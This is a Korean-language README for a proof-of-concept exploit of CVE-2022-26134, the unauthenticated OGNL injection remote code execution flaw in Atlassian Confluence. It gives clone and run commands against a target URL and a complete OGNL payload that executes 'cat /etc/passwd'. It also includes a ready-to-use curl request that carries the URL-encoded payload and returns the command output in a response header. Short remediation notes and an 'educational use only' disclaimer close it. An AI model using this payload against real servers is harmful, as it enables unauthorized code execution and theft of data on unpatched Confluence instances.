
CVE-2022-26134에 대한 개념 증명 익스플로잇으로, Atlassian Confluence Server 및 Data Center에서 인증되지 않은 OGNL 인젝션 취약점을 통해 원격 코드 실행을 가능하게 합니다.
Atlassian Confluence 7.18 이하 제품에 영향을 미치는 원격 코드 실행 취약점을 악용하는 개념 증명 스크립트입니다. OGNL 주입 취약점으로 인해 인증되지 않은 사용자가 Confluence Server 또는 Data Center 인스턴스에서 임의 코드를 실행할 수 있습니다.
지원되는 모든 Confluence Server 및 Data Center 버전이 영향을 받습니다.
1.3.0 이후부터 7.18.1 이하의 Confluence Server 및 Data Center 버전이 영향을 받습니다.
이 취약점은 심각도에 대해 CVSS 점수가 10점 만점에 10점입니다.
저장소를 클론하세요.
git clone https://gitlab.com/Naqwada/cve-2022-26134
cd CVE-2022-26134
그런 다음 원하는 명령어로 익스플로잇을 실행할 수 있습니다:
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
CURL 명령어 예시:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
그러면 명령어 실행 결과가 응답 헤더의 X-Cmd-Response 매개변수에 반영됩니다.
Atlassian의 공식 권장 사항을 따르세요:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian은 이 문제에 대한 패치가 포함된 버전 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 및 7.18.1을 출시했습니다.
이 취약점은 모든 자체 호스팅 인스턴스에 영향을 미칩니다. WAF를 사용하는 경우 ${가 포함된 URL을 차단할 수 있습니다.
YARA (Volexity 작성): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
교육 목적으로만 사용하세요.
